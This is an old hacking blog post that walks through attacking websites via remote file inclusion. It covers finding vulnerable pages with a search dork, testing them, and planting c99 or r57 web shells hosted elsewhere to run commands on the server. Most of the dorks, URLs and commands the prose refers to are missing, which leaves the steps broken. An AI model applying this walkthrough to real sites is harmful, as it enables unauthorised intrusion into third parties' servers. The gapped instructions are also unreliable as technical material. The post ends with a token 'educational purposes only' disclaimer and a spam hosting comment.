Monday, October 3, 2011

Hacking Website Using Remote File Inclusion

Welcome back to hacking-class.In this article I will tell about Remote file inclusion It is basically  one of the most common vulnerability found in web application. This type of vulnerability allows the Hacker or attacker to add a remote file on the web server. If the attacker gets successful in performing the attack he/she will gain access to the web server and hence can execute any command on it..

1-Searching the Vulnerability
Remote File inclusion vulnerability is usually occured in those sites which have a url similar to the below one
The Google Dork is
This will show all the pages which has “index.php?page=” in their URL, Now to test whether the website is vulnerable to Remote file Inclusion or not the hacker normaly use the following command

But as I am Posting this here so the links must be hatke :P

I found this site it is very good to give you example

Now we wanna check if it is vulnerable .. we type

Now This appears 

A website opens in another website this means this website is vulnerable to RFI.

You can also type

and u will get some similar results.

Ok now Moving On to the next part...

Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. 

The hacker would first upload the shells to a webhosting site such as, etc.
Now here is how a hacker would execute the shells to gain access. Lets say that the url of the shell is.
Now here how the hacker will execute the command  on the website 
Now whoila We have executed the shell

 Now I will not tell how to run your scripts using the shell try finding out your self.

NOte- Remember to add “?” at the end of url or else the shell will not execute..

This is for educational purposes only using this knowledge in a illegal way  is strictly prohibited. 


  • December 7, 2016 at 7:12 PM
    Blogger says:

    DreamHost is definitely the best hosting provider for any hosting plans you might require.


Post a Comment

New Hacks to Your Mail - Follow by Email

Related Posts Plugin for WordPress, Blogger...

Popular posts


Computer Hack World Copyright © 2011 -- Template created by O Pregador -- Powered by Blogger